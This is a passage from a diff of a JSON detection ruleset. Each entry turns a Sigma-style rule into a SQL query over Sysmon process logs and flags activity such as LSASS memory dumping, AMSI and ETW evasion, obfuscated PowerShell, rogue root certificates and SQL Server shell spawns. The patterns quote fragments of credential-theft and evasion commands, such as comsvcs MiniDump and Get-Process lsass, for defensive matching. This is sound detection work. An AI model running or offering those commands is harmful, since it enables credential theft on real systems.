'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_print_remote_file_copy.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", - "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "status": "test", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "Use of PktMon.exe", - "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", - "status": "test", - "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", - "author": "frack113", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1040" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Legitimate use" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pktmon.yml" + "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "CL_Mutexverifiers.ps1 Proxy Execution", - "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "title": "Potential Dosfuscation Activity", + "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands", - "author": "oscd.community, Natalia Shornikova, frack113", + "description": "Detects possible payload obfuscation via the commandline", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" + "filename": "proc_creation_win_cmd_dosfuscation.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "status": "test", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1059.001", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", - "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", - "author": "Florian Roth (Nextron Systems)", + "title": "New Root Certificate Installed Via CertMgr.EXE", + "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", + "status": "test", + "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ - "attack.execution", - "attack.t1559" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_certmgr_certificate_installation.yml" }, { - "title": "Browser Started with Remote Debugging", - "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", - "status": "experimental", - "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "status": "test", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1185" + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (Image LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_remote_debugging.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Detection of PowerShell Execution via Sqlps.exe", - "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", - "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.community", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1127" + "attack.t1036.003" ], "falsepositives": [ - "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", - "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "status": "experimental", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "Potential Persistence Attempt Via Existing Service Tampering", - "id": "38879043-7e1e-47a9-8d46-6bec88e201df", - "status": "test", - "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", - "author": "Sreeman", - "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1574.011" - ], + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "status": "experimental", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "status": "experimental", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "falsepositives": [ - "Unlikely" + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_mssql_susp_child_process.yml" }, { - "title": "Windows Credential Manager Access via VaultCmd", - "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", + "id": "92a974db-ab84-457f-9ec0-55db83d7a825", "status": "experimental", - "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", - "author": "frack113", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_vaultcmd_list_creds.yml" + "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", - "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "status": "experimental", + "description": "Detects the execution of a renamed version of the Plink binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1036" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') 